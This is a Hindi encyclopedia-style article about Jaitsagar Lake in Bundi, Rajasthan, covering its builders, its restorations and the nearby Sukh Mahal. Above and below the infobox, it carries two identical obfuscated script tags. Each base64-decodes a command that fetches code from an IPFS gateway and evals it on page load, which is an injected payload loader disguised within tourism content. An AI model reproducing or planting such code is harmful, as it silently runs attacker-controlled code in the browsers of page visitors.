जैतसागर झील
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
जैतसागर झील
| |
विवरण | 'जैतसागर झील' राजस्थान की प्रमुख झीलों में से एक तथा प्रसिद्ध पर्यटन स्थल है। |
राज्य | राजस्थान |
ज़िला | बूँदी |
निर्माता | राजा जैता मीणा |
भौगोलिक स्थिति | बूँदी शहर के उत्तर पूर्व में शहर से करीब एक किलोमीटर दूर |
संबंधित लेख | राजस्थान, राजस्थान पर्यटन, बूँदी, बूँदी चित्रकला
|
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
जैतसागर झील (अंग्रेज़ी: Jaitsagar Lake) बूँदी, राजस्थान में स्थित महत्त्वपूर्ण झील है। यह बूँदी शहर के उत्तर पूर्व में शहर से करीब एक किलोमीटर दूर पहाड़ की तलहटी में स्थित है।
- पहाड़ों के मध्य झूला झूलती प्रतीत होती इस झील को बूँदी के राजा जैता मीणा ने बनवाया था, जिसका जीर्णोद्धार राव राजा सुरजन सिंह की माता रानी जयवंती ने करवाया था।
- इसके बाद इस झील का पुनरुद्धार राव राजा विष्णु सिंह के कारीगर सुखराम ने कराया और इसके निकट ग्रीष्म ऋतु में शाही परिवार के रहने के लिए 'सुखमहल' नामक विश्रामगाह भी बनवाया, जिसमें विश्वविख्यात लेखक रुड्यार्ड किपलिंग अपने भारत में प्रवास के दौरान ठहरे थे।
- जैतसागर झील को 'बड़ा तालाब' भी कहते हैं।
- यह झील 4455 हैक्टेयर भूमि में फैली है।
- सन 1995 तक यह झील ताजे पानी का स्रोत थी।
- इस झील में लगे फव्वारे के चलने पर झील का झिलमिलाता पानी अत्यंत आकर्षक व मनोहारी लगता है।
|
|
|
|
|